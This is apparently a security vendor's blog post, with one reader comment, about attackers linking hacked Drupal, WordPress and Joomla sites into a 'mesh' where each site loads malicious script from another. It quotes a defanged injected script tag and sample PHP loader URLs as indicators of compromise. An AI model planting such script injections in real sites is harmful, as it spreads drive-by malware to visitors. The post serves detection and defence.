Can you imagine having the keys to a kingdom? How awesome would that be!! This is true in all domains, especialy when it comes to your website. This is almost like the holy grail of website attacks, gain access and do what you want with someone else’s pride and joy.
We all know that once a website is compromised it can be used by attackers in various ways. The most common attack we see leverages the hacked site as part of a malicious SEO Spam campaign (because they are the most profitable), followed by malware distribution (think drive-by-downloads) and of course the integration into botnets, to perform things like DDOS / brute force attacks on other sites.
In any of these scenarios the attacker is able to, more often than not, monetize “their” new website. Yes, the fact that they have gained access to your website makes it theirs now. On a side note, we are seeing a tremendous number of websites being used to mine bitcoins specifically, but being that it’s the new billion dollar currency it only makes sense, but I digress.
Back to the point…
None of this, of course, is new to our industry. Just crawl through the archives of this blog and you’ll find scores of data points that talk to the various scenarios addressed above. What you won’t find though is this new trend that we’re seeing.
Since the shutdown of the Blackhole Exploit kit we’ve been sitting back idly waiting for the next big thing, and perhaps this is it, but then again, perhaps it’s nothing more than something that hid in the shadow and is only now finally out in plain sight.
Let’s talk a little about website mesh networks and how they are being used to distribute malware.
What is a Mesh Network?
We won’t get into the details of what a mesh network is, but we’ll provide you a little context so that you can better understand it as you read through this post:
A mesh network is a network topology in which each node (called a mesh node) relays data for the network. All nodes cooperate in the distribution of data in the network. – Wikipedia
Yes, I know, not the fanciest of descriptions, but for our purpose it works. When reading through this, I want you think of each website as a node in the mesh.
In essence each of the websites, although hosted separately and owned by people who don’t know each other, are all inevitably interconnected to one another. Again, nothing new in the concept. We see it everyday in various botnets, right?
Mesh Network of Compromised Websites
The latest exploit kit payloads that we are tracking on compromised websites seem to have a very similar characteristics, they are part of a bigger network of compromised website, or what we’re classifying as a compromised website mesh network. As websites get infected, the attackers are continuously adding them to their larger network of malware intermediaries. This means the malware is not only being used against people visiting the website, but also against users of other compromised sites.
Think of a mesh network of script injections…
Let’s say the bad guy, Homer Simpson managed to hack into 3 web sites: X.com, Y.com and Z.com. Homer injects malware into X.com that then loads from Y.com. The malware from Y.com is loaded from Z.com and the one from Z.com is loaded from X.com.
That’s right folks, you guessed it, it’s one Giant Self-Licking Ice Cream Cone!!!
Here is a better illustration of the flow:
x.com -> injected with code loading from y.com/hNtpSAXt.php?id=56162149
y.com -> injected with code loading from z.com/8zCUWiW7.php?id=55158211
z.com -> injected with code loading from x.com/zsaok9XZ.php?id=45566441
The Benefit of Such a Network
The attacker no longer needs to register domains to hide malicious content and it is very hard to take down. The more sites he manages to compromise, the more powerful their mesh network of compromised websites becomes.
<script src="httx://tiande-rivne-com-ua.1gb. ua/hNtpSAXt.php ?id=56162149&quit;
With this simple payload we were able to identify some 800 websites and more than 19,000 pages compromised. And the injection always happen with the same format, a script src loading from a random PHP file and a random ID code. Every compromised site gets this PHP code injected in it.
These are just some of the injections we were able to capture:
What is the Scale of these Website Mesh Networks?
While it is really hard to provide definitives around how many websites are really compromised and injected with this type of infection we are able to provide some good educated guesses.
Using our very limited view, we identified 800+ domains within our own network of clients. Google agrees with us and it seems they identified a lot more sites, who would have thought, based on the safe browsing data.
If you look at http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=fixreputation.net, they say:
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 101 domain(s), including dimensiones.org/, rometransfer.com/, hout-atelier.nl/.
If you check http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=magazyntuiteraz.pl, you will see:
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 60 domain(s), including moyer-consulting.com/, rote-liebe96.de/, izorynek.pl/.
It seems that each website compromised is also used to infected 50+ different domains. The more you dive into the data, the more websites you find.
For instance, look at this one http://www.google.com/safebrowsing/diagnostic?site=tiande-rivne-com-ua.1gb.ua you will see:
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 662 domain(s), including ovptrade.com/, stalkerzoneworld.ru/, fondazionegiannipellicani.it/
You can see that with a little sleuthing the order of magnitude begins to quickly multiply.
How Are the Websites Being Compromised?
Ah yes, the age old question of how!
It’s not any easier to answer here as it’s ever been in any other post we share. As is often the case, we ascertain our data remotely and we are limited in a number ways. This case was no exception.
As for the how, we did try to scan several of the compromised websites in an attempt to identify the vector, but we had very little luck. While we were unable to find the much coveted “silver bullet” that tied them together, there was more in what we didn’t find than one might think.
For instance, a few of them were using Drupal, others were using WordPress and of course our Joomla friends were in on the action too. While this does not tell us the access vector, it does tell us the malware is platform agnostic.
From this we can make a very educated assumption that the attackers are more than likely using a suite of tools to exploit these websites. From brute force attacks against the various platforms’ admin panels for access control, to exploiting known or new vulnerabilities in any of the application code. What is curious though, is whether they are using an all-in-one tool or kit, and whether the payloads are being created independent of the platforms. Often, what we see is a payload specific to a platform which is later adapted or enhanced for other platforms. To find something like these attacks so tightly integrated and intertwined talks to an interesting trend.
Are you a webmaster? Do you own a web site? Please do your part by securing your site so it is not added to these compromised website mesh networks. There are various tools you can use to scan your websites and clean them up if they are infected, leverage them. Don’t get caught with your pants down!
Interesting post, Daniel.
I’ve seen a few examples of spam pointing to hacked WordPress sites. In each case they linked to a php file sitting in a plug-in folder.
In every case the plug-in folder was the same (I won’t name it here) and the files were for example mulberry.php or cheapghds.php – you may be familiar with the hack but it looks a lot like a mesh network.
I scanned one site on your sitecheck tool and got a malware warning, so I warned the owner.
But the plug-in is still on the WP directory, despite it not being updated in five years.
Apparently the plug-in is not necessarily the attack vector, but if the hacked files are always sitting in its folder surely it’s at least playing a part?
Comments are closed.